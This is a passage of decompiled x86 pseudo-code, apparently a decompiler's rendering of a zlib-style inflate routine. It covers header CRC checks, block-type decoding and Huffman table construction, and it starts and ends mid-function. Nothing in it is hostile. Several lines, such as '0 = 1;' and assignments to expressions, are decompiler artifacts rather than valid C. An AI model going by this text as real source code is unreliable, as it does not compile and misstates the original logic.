										__eflags =  *(__ebx + 0x40);
										if( *(__ebx + 0x40) != 0) {
											goto L322;
										} else {
											L82:
											goto L84;
										}
									case 6:
										L85:
										__edx = 0;
										__eflags = 0;
										L86:
										__eflags =  *(__ebx + 0x10) & 0x00000800;
										if(( *(__ebx + 0x10) & 0x00000800) == 0) {
											L100:
											__eax =  *(__ebx + 0x20);
											__eflags = __eax;
											if(__eax != 0) {
												 *(__eax + 0x1c) = __edx;
											}
											L102:
											__edx = 0;
											 *__ebx = 7;
											 *(__ebx + 0x40) = 0;
											goto L104;
										}
										L87:
										__eflags = __ecx;
										if(__ecx == 0) {
											goto L322;
										}
										L88:
										__esi =  *(__ebp - 4);
										__eax = __edx;
										_t177 = __ebp - 8; // 0x38
										__edx =  *_t177;
										while(1) {
											L89:
											__ecx =  *(__eax + __edx) & 0x000000ff;
											__eax = __eax + 1;
											 *(__ebp - 0x2c) = __ecx;
											__ecx =  *(__ebx + 0x20);
											 *(__ebp - 0x34) = __eax;
											__eflags = __ecx;
											if(__ecx != 0) {
												__edx =  *(0x1c + __ecx);
												__eflags =  *(0x1c + __ecx);
												if( *(0x1c + __ecx) != 0) {
													__edx =  *(__ebx + 0x40);
													__eflags = __edx -  *((intOrPtr*)(__ecx + 0x20));
													if(__edx <  *((intOrPtr*)(__ecx + 0x20))) {
														__ecx =  *(0x1c + __ecx);
														__eax =  *(__ebp - 0x2c);
														 *(__ecx + __edx) = __al;
														_t188 = __ebx + 0x40;
														 *_t188 =  *(__ebx + 0x40) + 1;
														__eflags =  *_t188;
														__eax =  *(__ebp - 0x34);
													}
												}
												_t191 = __ebp - 8; // 0x38
												__edx =  *_t191;
											}
											__eflags =  *(__ebp - 0x2c);
											if( *(__ebp - 0x2c) == 0) {
												break;
											}
											L95:
											__eflags = __eax - __esi;
											if(__eax < __esi) {
												continue;
											}
											break;
										}
										L96:
										__eflags =  *(__ebx + 0x10) & 0x00000200;
										_t196 = __ebp + 8; // 0x38
										__esi =  *_t196;
										if(( *(__ebx + 0x10) & 0x00000200) != 0) {
											 *(__ebx + 0x18) = __eax;
											__eax =  *(__ebp - 0x34);
										}
										__ecx =  *(__ebp - 4);
										 *(__ebp - 8) =  *(__ebp - 8) + __eax;
										__ecx =  *(__ebp - 4) - __eax;
										__eflags =  *(__ebp - 0x2c);
										 *(__ebp - 4) = __ecx;
										if( *(__ebp - 0x2c) != 0) {
											goto L322;
										} else {
											L99:
											goto L102;
										}
									case 7:
										L103:
										__edx = 0;
										__eflags = 0;
										L104:
										__eflags =  *(__ebx + 0x10) & 0x00001000;
										if(( *(__ebx + 0x10) & 0x00001000) == 0) {
											L118:
											__eax =  *(__ebx + 0x20);
											__eflags = __eax;
											if(__eax != 0) {
												 *(__eax + 0x24) = __edx;
											}
											L120:
											__edx =  *(__ebp - 0xc);
											 *__ebx = 8;
											goto L121;
										}
										L105:
										__eflags = __ecx;
										if(__ecx == 0) {
											goto L322;
										}
										L106:
										__esi =  *(__ebp - 4);
										__eax = __edx;
										_t212 = __ebp - 8; // 0x38
										__edx =  *_t212;
										while(1) {
											L107:
											__ecx =  *(__eax + __edx) & 0x000000ff;
											__eax = __eax + 1;
											 *(__ebp - 0x2c) = __ecx;
											__ecx =  *(__ebx + 0x20);
											 *(__ebp - 0x34) = __eax;
											__eflags = __ecx;
											if(__ecx != 0) {
												__edx =  *(__ecx + 0x24);
												__eflags =  *(__ecx + 0x24);
												if( *(__ecx + 0x24) != 0) {
													__edx =  *(__ebx + 0x40);
													__eflags = __edx -  *((intOrPtr*)(__ecx + 0x28));
													if(__edx <  *((intOrPtr*)(__ecx + 0x28))) {
														__ecx =  *(__ecx + 0x24);
														__eax =  *(__ebp - 0x2c);
														 *(__ecx + __edx) = __al;
														_t223 = __ebx + 0x40;
														 *_t223 =  *(__ebx + 0x40) + 1;
														__eflags =  *_t223;
														__eax =  *(__ebp - 0x34);
													}
												}
												_t226 = __ebp - 8; // 0x38
												__edx =  *_t226;
											}
											__eflags =  *(__ebp - 0x2c);
											if( *(__ebp - 0x2c) == 0) {
												break;
											}
											L113:
											__eflags = __eax - __esi;
											if(__eax < __esi) {
												continue;
											}
											break;
										}
										L114:
										__eflags =  *(__ebx + 0x10) & 0x00000200;
										_t231 = __ebp + 8; // 0x38
										__esi =  *_t231;
										if(( *(__ebx + 0x10) & 0x00000200) != 0) {
											 *(__ebx + 0x18) = __eax;
											__eax =  *(__ebp - 0x34);
										}
										__ecx =  *(__ebp - 4);
										 *(__ebp - 8) =  *(__ebp - 8) + __eax;
										__ecx =  *(__ebp - 4) - __eax;
										__eflags =  *(__ebp - 0x2c);
										 *(__ebp - 4) = __ecx;
										if( *(__ebp - 0x2c) != 0) {
											goto L322;
										} else {
											L117:
											goto L120;
										}
									case 8:
										L121:
										__eflags =  *(__ebx + 0x10) & 0x00000200;
										if(( *(__ebx + 0x10) & 0x00000200) == 0) {
											L129:
											__edx = 0;
											__eflags = 0;
											L130:
											__ecx =  *(__ebx + 0x20);
											__eflags = __ecx;
											if(__ecx != 0) {
												 *(__ebx + 0x10) =  *(__ebx + 0x10) >> 9;
												__eax =  *(__ebx + 0x10) >> 0x00000009 & 0x00000001;
												__eflags = __eax;
												 *(__ecx + 0x2c) = __eax;
												__eax =  *(__ebx + 0x20);
												 *( *(__ebx + 0x20) + 0x30) = 1;
											}
											__eax = E013230C1(__edx, __edx, __edx);
											 *(__ebx + 0x18) = __eax;
											 *(__esi + 0x30) = __eax;
											 *__ebx = 0xb;
											goto L133;
										}
										L122:
										_push(0x10);
										_pop(__eax);
										__eflags = __edi - __eax;
										if(__edi >= __eax) {
											L126:
											__eax =  *(__ebx + 0x18) & 0x0000ffff;
											__eflags = __edx - ( *(__ebx + 0x18) & 0x0000ffff);
											if(__edx == ( *(__ebx + 0x18) & 0x0000ffff)) {
												L128:
												__edx = 0;
												__edi = 0;
												 *(__ebp - 0xc) = 0;
												 *(__ebp - 0x10) = 0;
												goto L130;
											}
											L127:
											 *(__esi + 0x18) = "header crc mismatch";
											goto L17;
										}
										L123:
										_t246 = __ebp - 8; // 0x38
										__eax =  *_t246;
										while(1) {
											L124:
											__eflags = __ecx;
											if(__ecx == 0) {
												goto L322;
											}
											L125:
											__eax =  *__eax & 0x000000ff;
											 *(__ebp - 4) = __ecx;
											__ecx = __edi;
											__eax = __eax << __cl;
											__edi = __edi + 8;
											__ecx =  *(__ebp - 4);
											__edx = __eax + __edx;
											_t249 = __ebp - 8; // 0x38
											__eax =  *_t249;
											__eax =  *_t249 + 1;
											 *(__ebp - 0xc) = __edx;
											 *(__ebp - 8) = __eax;
											 *(__ebp - 0x10) = __edi;
											__eflags = __edi - 0x10;
											if(__edi < 0x10) {
												continue;
											}
											goto L126;
										}
										goto L322;
									case 9:
										L139:
										__eflags = __edi - 0x20;
										if(__edi >= 0x20) {
											L143:
											__ecx = __edx;
											__edi = 0xff00;
											__ecx = __edx & 0x0000ff00;
											__edx = __edx << 0x10;
											__ecx = (__edx & 0x0000ff00) + (__edx << 0x10);
											__edx = __edx >> 8;
											__eax = __edx >> 0x00000008 & 0x0000ff00;
											__ecx = (__edx & 0x0000ff00) + (__edx << 0x10) << 8;
											__eax = (__edx >> 0x00000008 & 0x0000ff00) + ((__edx & 0x0000ff00) + (__edx << 0x10) << 8);
											__edx = __edx >> 0x18;
											__ecx =  *(__ebp - 4);
											__eax = __eax + __edx;
											 *(__ebx + 0x18) = __eax;
											 *(__esi + 0x30) = __eax;
											__eax = 0;
											__edx = 0;
											 *__ebx = 0xa;
											 *(__ebp - 0xc) = 0;
											__edi = 0;
											goto L145;
										}
										L140:
										__eax =  *(__ebp - 8);
										while(1) {
											L141:
											__eflags = __ecx;
											if(__ecx == 0) {
												goto L322;
											}
											L142:
											__eax =  *__eax & 0x000000ff;
											 *(__ebp - 4) = __ecx;
											__ecx = __edi;
											__eax = __eax << __cl;
											__edi = __edi + 8;
											__ecx =  *(__ebp - 4);
											__edx = __eax + __edx;
											__eax =  *(__ebp - 8);
											__eax =  *(__ebp - 8) + 1;
											 *(__ebp - 0xc) = __edx;
											 *(__ebp - 8) = __eax;
											__eflags = __edi - 0x20;
											if(__edi < 0x20) {
												continue;
											}
											goto L143;
										}
										goto L322;
									case 0xa:
										L144:
										__eax = 0;
										__eflags = 0;
										L145:
										__eflags =  *((intOrPtr*)(__ebx + 0xc)) - __eax;
										if( *((intOrPtr*)(__ebx + 0xc)) == __eax) {
											L316:
											__eax =  *(__ebp - 0x1c);
											 *(__esi + 0xc) =  *(__ebp - 0x1c);
											__eax =  *(__ebp - 0x18);
											 *(__esi + 0x10) =  *(__ebp - 0x18);
											__eax =  *(__ebp - 8);
											 *__esi =  *(__ebp - 8);
											 *(__esi + 4) = __ecx;
											 *(__ebx + 0x38) = __edx;
											 *(__ebx + 0x3c) = __edi;
											_push(2);
											goto L137;
										}
										L146:
										__eax = E01322E91(__eax, __eax, __eax);
										__edx =  *(__ebp - 0xc);
										__ecx =  *(__ebp - 4);
										 *(__ebx + 0x18) = __eax;
										 *(__esi + 0x30) = __eax;
										 *__ebx = 0xb;
										goto L147;
									case 0xb:
										L147:
										__eflags =  *((intOrPtr*)(__ebp + 0xc)) - 5;
										if( *((intOrPtr*)(__ebp + 0xc)) == 5) {
											goto L322;
										}
										L148:
										__eflags =  *((intOrPtr*)(__ebp + 0xc)) - 6;
										if( *((intOrPtr*)(__ebp + 0xc)) == 6) {
											goto L322;
										}
										goto L149;
									case 0xc:
										L149:
										__eflags =  *(__ebx + 4);
										if( *(__ebx + 4) == 0) {
											L151:
											__eflags = __edi - 3;
											if(__edi >= 3) {
												L155:
												__eax = __edx;
												__edx = __edx >> 1;
												 *(__ebx + 4) = __eax;
												__edx = __edx & 0x00000003;
												__eax = __edx & 0x00000003;
												__eflags = __eax;
												if(__eax == 0) {
													L163:
													 *__ebx = 0xd;
													L164:
													__edx = __edx >> 2;
													__edi = __edi - 3;
													L21:
													 *(_t841 - 0xc) = _t822;
													 *(_t841 - 0x10) = _t833;
													goto L134;
												}
												L156:
												__eax = __eax - 1;
												__eflags = __eax;
												if(__eax == 0) {
													L161:
													__eax = E01321718(__ebx);
													 *__ebx = 0x13;
													__eflags =  *((intOrPtr*)(__ebp + 0xc)) - 6;
													if( *((intOrPtr*)(__ebp + 0xc)) != 6) {
														goto L164;
													}
													L162:
													__edx = __edx >> 2;
													__edi = __edi - 3;
													 *(__ebp - 0xc) = __edx;
													goto L322;
												}
												L157:
												__eax = __eax - 1;
												__eflags = __eax;
												if(__eax == 0) {
													_push(0x10);
													_pop(__eax);
													 *__ebx = __eax;
												} else {
													__eax = __eax - 1;
													__eflags = __eax;
													if(__eax == 0) {
														 *(__esi + 0x18) = "invalid block type";
														 *__ebx = 0x1d;
													}
												}
												goto L164;
											}
											L152:
											__eax =  *(__ebp - 8);
											while(1) {
												L153:
												__eflags = __ecx;
												if(__ecx == 0) {
													goto L322;
												}
												L154:
												__eax =  *__eax & 0x000000ff;
												 *(__ebp - 4) = __ecx;
												__ecx = __edi;
												__eax = __eax << __cl;
												__edi = __edi + 8;
												__ecx =  *(__ebp - 4);
												__edx = __eax + __edx;
												__eax =  *(__ebp - 8);
												__eax =  *(__ebp - 8) + 1;
												 *(__ebp - 0xc) = __edx;
												 *(__ebp - 8) = __eax;
												__eflags = __edi - 3;
												if(__edi < 3) {
													continue;
												}
												goto L155;
											}
											goto L322;
										}
										L150:
										__ecx = __edi;
										 *__ebx = 0x1a;
										__ecx = __edi & 0x00000007;
										__edx = __edx >> __cl;
										__edi = __edi - __ecx;
										 *(__ebp - 0xc) = __edx;
										 *(__ebp - 0x10) = __edi;
										goto L134;
									case 0xd:
										goto L0;
									case 0xe:
										goto L171;
									case 0xf:
										goto L172;
									case 0x10:
										L176:
										__eflags = __edi - 0xe;
										if(__edi >= 0xe) {
											L180:
											__eax = __edx;
											__edi = __edi - 0xe;
											__eax = __edx & 0x0000001f;
											__edx = __edx >> 5;
											__eax = __eax + 0x101;
											 *(__ebp - 0x10) = __edi;
											 *(__ebx + 0x60) = __eax;
											__eax = __edx;
											__eax = __edx & 0x0000001f;
											__edx = __edx >> 5;
											 *(__ebx + 0x64) = __eax;
											__eax = __edx;
											__eax = __edx & 0x0000000f;
											__edx = __edx >> 4;
											__eax = __eax + 4;
											 *(__ebp - 0xc) = __edx;
											__eflags =  *(__ebx + 0x60) - 0x11e;
											 *(__ebx + 0x5c) = __eax;
											if( *(__ebx + 0x60) > 0x11e) {
												L183:
												 *(__esi + 0x18) = "too many length or distance symbols";
												goto L31;
											}
											L181:
											__eflags =  *(__ebx + 0x64) - 0x1e;
											if( *(__ebx + 0x64) > 0x1e) {
												goto L183;
											}
											L182:
											 *(__ebx + 0x68) =  *(__ebx + 0x68) & 0x00000000;
											_push(0x11);
											_pop(__eax);
											 *__ebx = __eax;
											goto L189;
										}
										L177:
										__eax =  *(__ebp - 8);
										while(1) {
											L178:
											__eflags = __ecx;
											if(__ecx == 0) {
												goto L322;
											}
											L179:
											__eax =  *__eax & 0x000000ff;
											 *(__ebp - 4) = __ecx;
											__ecx = __edi;
											__eax = __eax << __cl;
											__edi = __edi + 8;
											__ecx =  *(__ebp - 4);
											__edx = __eax + __edx;
											__eax =  *(__ebp - 8);
											__eax =  *(__ebp - 8) + 1;
											 *(__ebp - 0xc) = __edx;
											 *(__ebp - 8) = __eax;
											__eflags = __edi - 0xe;
											if(__edi < 0xe) {
												continue;
											}
											goto L180;
										}
										goto L322;
									case 0x11:
										while(1) {
											L189:
											__eax =  *(__ebx + 0x68);
											__eflags =  *(__ebx + 0x68) -  *(__ebx + 0x5c);
											if( *(__ebx + 0x68) >=  *(__ebx + 0x5c)) {
												break;
											}
											L184:
											__eflags = __edi - 3;
											if(__edi >= 3) {
												L188:
												__eax =  *(__ebx + 0x68);
												__edx = __edx & 0x00000007;
												__edx = __edx >> 3;
												 *(__ebp - 0xc) = __edx;
												__eax =  *(0x1324908 +  *(__ebx + 0x68) * 2) & 0x0000ffff;
												 *((short*)(__ebx + 0x70 + ( *(0x1324908 +  *(__ebx + 0x68) * 2) & 0x0000ffff) * 2)) = __cx;
												 *(__ebx + 0x68) =  *(__ebx + 0x68) + 1;
												__edi = __edi - 3;
												__eflags = __edi;
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x10) = __edi;
												continue;
											}
											L185:
											__eax =  *(__ebp - 8);
											while(1) {
												L186:
												__eflags = __ecx;
												if(__ecx == 0) {
													goto L322;
												}
												L187:
												__eax =  *__eax & 0x000000ff;
												 *(__ebp - 4) = __ecx;
												__ecx = __edi;
												__eax = __eax << __cl;
												__edi = __edi + 8;
												__ecx =  *(__ebp - 4);
												__edx = __eax + __edx;
												__eax =  *(__ebp - 8);
												__eax =  *(__ebp - 8) + 1;
												 *(__ebp - 0xc) = __edx;
												 *(__ebp - 8) = __eax;
												__eflags = __edi - 3;
												if(__edi < 3) {
													continue;
												}
												goto L188;
											}
											goto L322;
										}
										L190:
										while(1) {
											L192:
											__eflags =  *(__ebx + 0x68) - 0x13;
											if( *(__ebx + 0x68) >= 0x13) {
												break;
											}
											L191:
											__eax =  *(__ebx + 0x68);
											__ecx = 0;
											__eax =  *(0x1324908 +  *(__ebx + 0x68) * 2) & 0x0000ffff;
											 *((short*)(__ebx + 0x70 + ( *(0x1324908 +  *(__ebx + 0x68) * 2) & 0x0000ffff) * 2)) = __cx;
											_t368 = __ebx + 0x68;
											 *_t368 =  *(__ebx + 0x68) + 1;
											__eflags =  *_t368;
										}
										L193:
										__eax = __ebx + 0x530;
										__ecx = __ebx + 0x6c;
										 *(__ebx + 0x4c) = __eax;
										 *(__ebx + 0x6c) = __eax;
										__edx = __ebx + 0x54;
										__eax = __ebx + 0x2f0;
										 *(__ebx + 0x54) = 7;
										__eax = __ebx + 0x70;
										__eax = E013233B4(0, __ebx + 0x70, 0x13, __ecx, __edx, __ebx + 0x2f0);
										 *(__ebp - 0x20) = __eax;
										__eflags = __eax;
										if(__eax == 0) {
											L196:
											 *(__ebx + 0x68) =  *(__ebx + 0x68) & 0x00000000;
											 *__ebx = 0x12;
											goto L224;
										}
										L194:
										 *(__esi + 0x18) = "invalid code lengths set";
										goto L195;
									case 0x12:
										while(1) {
											L224:
											 *(__ebx + 0x64) =  *(__ebx + 0x64) +  *(__ebx + 0x60);
											__ecx =  *(__ebx + 0x68);
											 *(__ebp - 0x2c) = __ecx;
											__eflags = __ecx -  *(__ebx + 0x64) +  *(__ebx + 0x60);
											if(__ecx <  *(__ebx + 0x64) +  *(__ebx + 0x60)) {
												goto L199;
											} else {
												break;
											}
											while(1) {
												L199:
												__ecx =  *(__ebx + 0x54);
												__edx = 0;
												__eax =  *(__ebx + 0x4c);
												1 = 1 << __cl;
												__edx = (1 << __cl) - 1;
												__edx = (1 << __cl) - 0x00000001 &  *(__ebp - 0xc);
												__eax =  *( *(__ebx + 0x4c) + ((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) * 4);
												__eax = __eax >> 8;
												__ecx = __cl & 0x000000ff;
												 *(__ebp - 0x34) = __eax;
												__eflags = (__cl & 0x000000ff) - __edi;
												if((__cl & 0x000000ff) <= __edi) {
													break;
												}
												L197:
												__ecx =  *(__ebp - 4);
												__eflags = __ecx;
												if(__ecx == 0) {
													goto L323;
												}
												L198:
												__edx =  *(__ebp - 8);
												 *(__ebp - 4) = __ecx;
												__ecx = __edi;
												 *__edx & 0x000000ff = ( *__edx & 0x000000ff) << __cl;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) + (( *__edx & 0x000000ff) << __cl);
												 *(__ebp - 8) = __edx;
												__edi = __edi + 8;
												__eflags = __edi;
											}
											L200:
											__edx = __eax;
											_push(0x10);
											__edx = __eax >> 0x10;
											_pop(__ecx);
											__eflags = __dx - __cx;
											if(__eflags >= 0) {
												L202:
												if(__eflags != 0) {
													L208:
													__edx =  *(__ebp - 0xc);
													_push(0x11);
													_pop(__ecx);
													__eflags =  *(__ebp - 0x32) - __cx;
													__ecx = __ah & 0x000000ff;
													if( *(__ebp - 0x32) != __cx) {
														L214:
														 *(__ebp - 0x10) = __ecx;
														while(1) {
															L215:
															_t432 = __ecx + 7; // 0x18
															__eax = _t432;
															__eflags = __edi - _t432;
															if(__edi >= _t432) {
																break;
															}
															L216:
															__ecx =  *(__ebp - 4);
															__eflags = __ecx;
															if(__ecx == 0) {
																goto L323;
															}
															L217:
															__eax =  *(__ebp - 8);
															 *(__ebp - 4) = __ecx;
															__ecx = __edi;
															 *( *(__ebp - 8)) & 0x000000ff = ( *( *(__ebp - 8)) & 0x000000ff) << __cl;
															__ecx =  *(__ebp - 0x10);
															__edx = __edx + (( *( *(__ebp - 8)) & 0x000000ff) << __cl);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															__edi = __edi + 8;
															 *(__ebp - 0xc) = __edx;
														}
														L218:
														__edx = __edx >> __cl;
														__ecx = __edx;
														__edx = __edx >> 7;
														__ecx = __ecx & 0x0000007f;
														_push(0xfffffff9);
														_pop(__eax);
														__ecx = __ecx + 0xb;
														__eax = __eax -  *(__ebp - 0x10);
														__eflags = __eax;
														L219:
														 *(__ebp - 0x34) =  *(__ebp - 0x34) & 0x00000000;
														__edi = __edi + __eax;
														__eflags = __edi;
														L220:
														 *(__ebx + 0x64) =  *(__ebx + 0x64) +  *(__ebx + 0x60);
														 *(__ebp - 0x30) = __ecx;
														__ecx = __ecx +  *(__ebp - 0x2c);
														 *(__ebp - 0xc) = __edx;
														 *(__ebp - 0x10) = __edi;
														__eflags = __ecx -  *(__ebx + 0x64) +  *(__ebx + 0x60);
														if(__ecx >  *(__ebx + 0x64) +  *(__ebx + 0x60)) {
															L227:
															 *(__esi + 0x18) = "invalid bit length repeat";
															 *__ebx = 0x1d;
															L228:
															__eflags =  *__ebx - 0x1d;
															if( *__ebx == 0x1d) {
																L133:
																__edx =  *(__ebp - 0xc);
																goto L134;
															}
															L229:
															__eax = 0;
															__eflags =  *((intOrPtr*)(__ebx + 0x270)) - __ax;
															if( *((intOrPtr*)(__ebx + 0x270)) != __ax) {
																L231:
																__eax = __ebx + 0x530;
																__ecx = __ebx + 0x6c;
																 *(__ebx + 0x4c) = __eax;
																 *(__ebx + 0x6c) = __eax;
																__edx = __ebx + 0x54;
																__eax = __ebx + 0x2f0;
																 *(__ebx + 0x54) = 9;
																__eax = __ebx + 0x70;
																__eax = E013233B4(1, __ebx + 0x70,  *(__ebx + 0x60), __ecx, __edx, __ebx + 0x2f0);
																 *(__ebp - 0x20) = __eax;
																__eflags = __eax;
																if(__eax == 0) {
																	L233:
																	__ecx = __ebx + 0x6c;
																	__eax =  *__ecx;
																	__edx = __ebx + 0x58;
																	 *(__ebx + 0x50) =  *__ecx;
																	__ebx + 0x2f0 =  *(__ebx + 0x60);
																	__eax =  *(__ebx + 0x60) + 0x38;
																	 *(__ebx + 0x58) = 6;
																	__eax = __ebx + ( *(__ebx + 0x60) + 0x38) * 2;
																	__eax = E013233B4(2, __ebx + ( *(__ebx + 0x60) + 0x38) * 2,  *(__ebx + 0x64), __ecx, __edx, __ebx + 0x2f0);
																	 *(__ebp - 0x20) = __eax;
																	__eflags = __eax;
																	if(__eax == 0) {
																		L235:
																		__eflags =  *((intOrPtr*)(__ebp + 0xc)) - 6;
																		__ecx =  *(__ebp - 4);
																		 *__ebx = 0x13;
																		if( *((intOrPtr*)(__ebp + 0xc)) == 6) {
																			goto L323;
																		}
																		L236:
																		__edx =  *(__ebp - 0xc);
																		goto L237;
																	}
																	L234:
																	 *(__esi + 0x18) = "invalid distances set";
																	L195:
																	 *__ebx = 0x1d;
																	goto L133;
																}
																L232:
																 *(__esi + 0x18) = "invalid literal/lengths set";
																goto L195;
															}
															L230:
															 *(__esi + 0x18) = "invalid code -- missing end-of-block";
															goto L195;
														}
														L221:
														__ecx =  *(__ebp - 0x30);
														__eflags = __ecx;
														if(__ecx == 0) {
															continue;
														}
														L222:
														__edx =  *(__ebp - 0x34);
														do {
															L223:
															__eax =  *(__ebx + 0x68);
															 *((short*)(__ebx + 0x70 +  *(__ebx + 0x68) * 2)) = __dx;
															 *(__ebx + 0x68) =  *(__ebx + 0x68) + 1;
															__ecx = __ecx - 1;
															__eflags = __ecx;
														} while (__ecx != 0);
														continue;
													}
													L209:
													 *(__ebp - 0x10) = __ecx;
													while(1) {
														L210:
														_t422 = __ecx + 3; // 0x14
														__eax = _t422;
														__eflags = __edi - _t422;
														if(__edi >= _t422) {
															break;
														}
														L211:
														__ecx =  *(__ebp - 4);
														__eflags = __ecx;
														if(__ecx == 0) {
															goto L323;
														}
														L212:
														__eax =  *(__ebp - 8);
														 *(__ebp - 4) = __ecx;
														__ecx = __edi;
														 *( *(__ebp - 8)) & 0x000000ff = ( *( *(__ebp - 8)) & 0x000000ff) << __cl;
														__ecx =  *(__ebp - 0x10);
														__edx = __edx + (( *( *(__ebp - 8)) & 0x000000ff) << __cl);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														__edi = __edi + 8;
														 *(__ebp - 0xc) = __edx;
													}
													L213:
													__edx = __edx >> __cl;
													__ecx = __edx;
													__edx = __edx >> 3;
													__ecx = __ecx & 0x00000007;
													_push(0xfffffffd);
													_pop(__eax);
													__ecx = __ecx + 3;
													__eax = __eax -  *(__ebp - 0x10);
													goto L219;
												}
												L203:
												__eax = __eax >> 8;
												__ecx = __cl & 0x000000ff;
												__ecx = (__cl & 0x000000ff) + 2;
												 *(__ebp - 0x34) = __ecx;
												__eflags = __edi - __ecx;
												if(__edi >= __ecx) {
													L206:
													__edx =  *(__ebp - 0xc);
													__ecx = __ah & 0x000000ff;
													__eax =  *(__ebp - 0x2c);
													__edi = __edi - __ecx;
													__edx =  *(__ebp - 0xc) >> __cl;
													 *(__ebp - 0xc) = __edx;
													 *(__ebp - 0x10) = __edi;
													__eflags = __eax;
													if(__eax == 0) {
														L226:
														 *(__esi + 0x18) = "invalid bit length repeat";
														goto L17;
													}
													L207:
													__eax =  *(__ebx + 0x6e + __eax * 2) & 0x0000ffff;
													__ecx = __edx;
													__ecx = __edx & 0x00000003;
													__edx = __edx >> 2;
													__ecx = __ecx + 3;
													 *(__ebp - 0x34) = __eax;
													__edi = __edi - 2;
													goto L220;
												} else {
													goto L204;
												}
												while(1) {
													L204:
													__ecx =  *(__ebp - 4);
													__eflags = __ecx;
													if(__ecx == 0) {
														goto L323;
													}
													L205:
													 *(__ebp - 4) = __ecx;
													__ecx =  *(__ebp - 8);
													__edx =  *( *(__ebp - 8)) & 0x000000ff;
													__ecx = __edi;
													__edx = ( *( *(__ebp - 8)) & 0x000000ff) << __cl;
													__edi = __edi + 8;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) + (( *( *(__ebp - 8)) & 0x000000ff) << __cl);
													 *(__ebp - 8) =  *(__ebp - 8) + 1;
													__eflags = __edi -  *(__ebp - 0x34);
													if(__edi <  *(__ebp - 0x34)) {
														continue;
													}
													goto L206;
												}
												goto L323;
											}
											L201:
											__eax = __eax >> 8;
											__ecx = __al & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											__edi = __edi - (__al & 0x000000ff);
											 *(__ebp - 0xc) =  *(__ebp - 0xc) >> __cl;
											 *(__ebp - 0x10) = __edi;
											 *((short*)(__ebx + 0x70 +  *(__ebp - 0x2c) * 2)) = __dx;
											 *(__ebx + 0x68) =  *(__ebx + 0x68) + 1;
										}
										L225:
										goto L228;
									case 0x13:
										L237:
										 *__ebx = 0x14;
										goto L238;
									case 0x14:
										L238:
										__eflags = __ecx - 6;
										if(__ecx < 6) {
											L242:
											__eax =  *(__ebx + 0x4c);
											__ecx =  *(__ebx + 0x54);
											 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) & 0x00000000;
											 *(__ebp - 0x30) =  *(__ebx + 0x4c);
											0 = 1;
											__eax = 1 << __cl;
											__ecx =  *(__ebx + 0x4c);
											__eax = (1 << __cl) - 1;
											__eax = (1 << __cl) - 0x00000001 & __edx;
											__eax =  *( *(__ebx + 0x4c) + ((1 << __cl) - 0x00000001 & __edx) * 4);
											while(1) {
												L245:
												__eax = __eax >> 8;
												__ecx = __cl & 0x000000ff;
												__eflags = (__cl & 0x000000ff) - __edi;
												if((__cl & 0x000000ff) <= __edi) {
													break;
												}
												L243:
												__ecx =  *(__ebp - 4);
												__eflags = __ecx;
												if(__ecx == 0) {
													goto L323;
												}
												L244:
												__eax =  *(__ebp - 8);
												 *(__ebp - 4) = __ecx;
												__ecx = __edi;
												__edi = __edi + 8;
												 *(__ebp - 0x10) = __edi;
												 *( *(__ebp - 8)) & 0x000000ff = ( *( *(__ebp - 8)) & 0x000000ff) << __cl;
												__ecx =  *(__ebx + 0x54);
												__edx = __edx + (( *( *(__ebp - 8)) & 0x000000ff) << __cl);
												 *(__ebp - 8) =  *(__ebp - 8) + 1;
												__eax =  *(__ebx + 0x4c);
												 *(__ebp - 0xc) = __edx;
												0 = 1;
												1 << __cl = (1 << __cl) - 1;
												__edx = (1 << __cl) - 0x00000001 &  *(__ebp - 0xc);
												__eflags = 1;
												__eax =  *( *(__ebx + 0x4c) + ((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) * 4);
												__edx =  *(__ebp - 0xc);
											}
											L246:
											__eflags = __al;
											if(__al == 0) {
												L252:
												__eax = __eax >> 8;
												__ecx = __cl & 0x000000ff;
												 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) + __ecx;
												__edi = __edi - __ecx;
												__edx = __edx >> __cl;
												__ecx = __eax;
												__ecx = __eax >> 0x10;
												 *(__ebp - 0xc) = __edx;
												 *(__ebp - 0x10) = __edi;
												 *(__ebx + 0x40) = __ecx;
												__eflags = __al;
												if(__al != 0) {
													L254:
													__eflags = __al & 0x00000020;
													if((__al & 0x00000020) == 0) {
														L256:
														__ecx =  *(__ebp - 4);
														__eflags = __al & 0x00000040;
														if((__al & 0x00000040) == 0) {
															L258:
															__eax = __al & 0x000000ff;
															__eax = __al & 0xf;
															__eflags = __eax;
															 *__ebx = 0x15;
															 *(__ebx + 0x48) = __eax;
															goto L259;
														}
														L257:
														 *(__esi + 0x18) = "invalid literal/length code";
														L31:
														 *__ebx = 0x1d;
														goto L135;
													}
													L255:
													 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) | 0xffffffff;
													 *__ebx = 0xb;
													goto L134;
												}
												L253:
												 *__ebx = 0x19;
												goto L134;
											}
											L247:
											__eflags = __al & 0x000000f0;
											if((__al & 0x000000f0) != 0) {
												goto L252;
											}
											L248:
											__edi = 0;
											__ecx = __al & 0x000000ff;
											__ebx = __eax;
											__edi = 1;
											__ebx = __eax >> 8;
											__edx = __eax;
											__esi = __bl & 0x000000ff;
											__ecx = (__al & 0x000000ff) + __esi;
											__eax = __eax >> 0x10;
											__edi = 1 << __cl;
											__ecx = __esi;
											__edi = (1 << __cl) - 1;
											 *(__ebp - 0x34) = __edx;
											(1 << __cl) - 0x00000001 &  *(__ebp - 0xc) = ((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) >> __cl;
											__ecx =  *(__ebp - 0x30);
											__edi = __eax + (((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) >> __cl);
											__eax =  *( *(__ebp - 0x30) + (__eax + (((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) >> __cl)) * 4);
											__ecx = __eax;
											__edi =  *(__ebp - 0x10);
											__ecx = __eax >> 8;
											__esi = __cl & 0x000000ff;
											__ecx = __bl & 0x000000ff;
											__ebx =  *(__ebp - 0x24);
											__esi = (__cl & 0x000000ff) + (__bl & 0x000000ff);
											__eflags = (__cl & 0x000000ff) + (__bl & 0x000000ff) - __edi;
